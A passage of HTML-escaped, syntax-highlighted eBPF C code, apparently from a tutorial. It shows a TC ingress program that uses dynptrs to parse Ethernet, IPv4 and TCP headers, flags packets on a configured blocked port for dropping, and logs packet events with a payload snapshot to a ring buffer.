                              &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buffer__opt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;buffer__sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;__ksym&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* 16MB */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;events&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_cfg&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;cfg_map&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tc"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;dynptr_tc_ingress&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;__sk_buff&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_cfg&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Temporary buffers for slice (data may be copied here) */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ethhdr&lt;/span&gt; &lt;span class="n"&gt;eth_buf&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;iphdr&lt;/span&gt;  &lt;span class="n"&gt;ip_buf&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;tcphdr&lt;/span&gt; &lt;span class="n"&gt;tcp_buf&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ethhdr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;iphdr&lt;/span&gt;  &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;tcphdr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;cfg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;cfg_map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create dynptr from skb */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_dynptr_from_skb&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse Ethernet header using slice */&lt;/span&gt;
    &lt;span class="n"&gt;eth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;eth_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;eth_buf&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;h_proto&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;bpf_htons&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ETH_P_IP&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse IPv4 header */&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;ip_off&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;iph&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ip_off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ip_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ip_buf&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;iph&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;version&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;protocol&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;IPPROTO_TCP&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse TCP header */&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;tcp_off&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ip_off&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ihl&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;tcp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tcp_off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tcp_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tcp_buf&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ntohs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;dest&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;sport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ntohs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;source&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__u8&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="cm"&gt;/* Output variable-length event using ringbuf dynptr */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;__u8&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_SNAPLEN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;

        &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;payload_off&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tcp_off&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;doff&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload_off&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;avail&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;payload_off&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;avail&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;avail&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;MAX_SNAPLEN&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;MAX_SNAPLEN&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_dynptr_read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;payload_off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event_hdr&lt;/span&gt; &lt;span class="n"&gt;hdr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ts_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pkt_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;

        &lt;span class="cm"&gt;/* Reserve variable-length ringbuf record */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;total_sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve_dynptr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;total_sz&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="cm"&gt;/* Must discard even on failure */&lt;/span&gt;
            &lt;span class="n"&gt;bpf_ringbuf_discard_dynptr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_SHOT&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;bpf_dynptr_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;bpf_dynptr_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

